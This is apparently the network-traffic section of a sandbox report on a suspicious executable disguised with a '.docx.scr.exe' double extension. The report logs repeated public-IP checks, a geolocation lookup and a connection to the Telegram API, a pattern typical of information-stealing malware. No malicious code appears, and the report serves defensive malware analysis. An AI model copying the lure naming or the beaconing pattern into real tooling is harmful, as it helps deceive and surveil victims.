                                                                                                                                                                    Dec 17, 2024 08:33:27.249509096 CET44349749104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:27.296866894 CET4974680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:28.465368986 CET44349749104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:28.497023106 CET49749443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:28.497049093 CET44349749104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:28.910604000 CET44349749104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:28.910696983 CET44349749104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:28.910759926 CET49749443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:28.911240101 CET49749443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:28.914463997 CET4974680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:28.915709019 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:29.034635067 CET8049746193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:29.034770966 CET4974680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:29.035521984 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:29.035619020 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:29.035794020 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:29.155472994 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:30.130964994 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:30.134493113 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:30.134542942 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:30.134623051 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:30.134862900 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:30.134876966 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:30.187506914 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:31.357956886 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.366992950 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:31.367017984 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.814594030 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.814691067 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.814779043 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:31.815162897 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:31.818073988 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:31.819255114 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:31.938169003 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.938298941 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:31.939013958 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:31.939093113 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:31.939243078 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:32.058911085 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:33.048707008 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:33.050149918 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:33.050204039 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:33.050302029 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:33.050554991 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:33.050569057 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:33.093754053 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.263364077 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.273233891 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:34.273323059 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.707823992 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.707900047 CET44349755104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.707989931 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:34.708571911 CET49755443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:34.712315083 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.713426113 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.832508087 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.832828999 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.833165884 CET8049756193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:34.833262920 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.833580017 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:34.953263998 CET8049756193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:36.308022022 CET8049756193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:36.310200930 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:36.310230970 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:36.310381889 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:36.310764074 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:36.310777903 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:36.359437943 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:37.576242924 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:37.580024004 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:37.580063105 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.020283937 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.020380020 CET44349757104.21.67.152192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.020450115 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:38.021059036 CET49757443192.168.2.4104.21.67.152
                                                                                                                                                                    Dec 17, 2024 08:33:38.034846067 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:38.155457020 CET8049756193.122.130.0192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.155682087 CET4975680192.168.2.4193.122.130.0
                                                                                                                                                                    Dec 17, 2024 08:33:38.176467896 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:38.176505089 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.176608086 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:38.177229881 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:38.177257061 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:39.543236017 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:39.543303013 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:39.547821999 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:39.547842979 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:39.548093081 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:39.550126076 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:39.595323086 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:40.047343016 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:40.047413111 CET44349758149.154.167.220192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:40.047568083 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:40.057166100 CET49758443192.168.2.4149.154.167.220
                                                                                                                                                                    Dec 17, 2024 08:33:45.326778889 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 17, 2024 08:33:11.054406881 CET6491053192.168.2.41.1.1.1
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET53649101.1.1.1192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:12.929461002 CET6004653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 17, 2024 08:33:13.066812992 CET53600461.1.1.1192.168.2.4
                                                                                                                                                                    Dec 17, 2024 08:33:38.035490036 CET6339753192.168.2.41.1.1.1
                                                                                                                                                                    Dec 17, 2024 08:33:38.175308943 CET53633971.1.1.1192.168.2.4
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 17, 2024 08:33:11.054406881 CET192.168.2.41.1.1.10x33aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:12.929461002 CET192.168.2.41.1.1.10x24c9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:38.035490036 CET192.168.2.41.1.1.10xc816Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:11.193581104 CET1.1.1.1192.168.2.40x33aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:13.066812992 CET1.1.1.1192.168.2.40x24c9No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:13.066812992 CET1.1.1.1192.168.2.40x24c9No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 17, 2024 08:33:38.175308943 CET1.1.1.1192.168.2.40xc816No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449733193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:11.324584007 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:12.430684090 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:12 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 7e6797a1251a9de356b8a33f87fa55a2
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Dec 17, 2024 08:33:12.435235977 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 17, 2024 08:33:12.755407095 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:12 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: fe84a7b12471629b7d7753ca071c9bf4
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Dec 17, 2024 08:33:14.839340925 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 17, 2024 08:33:15.463963032 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:15 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 8f237222f02b9eeafb93f52e8d5d9964
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449738193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:17.260054111 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 17, 2024 08:33:18.369180918 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:18 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 35af7c114262baccb9dc00ee04cc957a
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449740193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:20.192437887 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 17, 2024 08:33:21.291553020 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:21 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: c56b1c6d84916831056b4107a59c8c3a
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.449743193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:23.145308018 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:24.243148088 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:24 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: d11f2005d92bdd126eaee07bce71e159
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.449746193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:26.149780989 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:27.247442007 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 02a4b99bbf86cb8bf32850bfa10b52af
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.449751193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:29.035794020 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:30.130964994 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:29 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 9782da7886769a990e7ef4a1e502bc9d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.449754193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:31.939243078 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:33.048707008 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:32 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 78a2326fedcb45208fcbbf3044aaec83
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.449756193.122.130.0806644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 17, 2024 08:33:34.833580017 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 17, 2024 08:33:36.308022022 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:36 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 61078adf60c09df80413fd9a1a347dad
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449734104.21.67.1524436644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-17 07:33:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-17 07:33:14 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:14 GMT
                                                                                                                                                                    Content-Type: text/xml
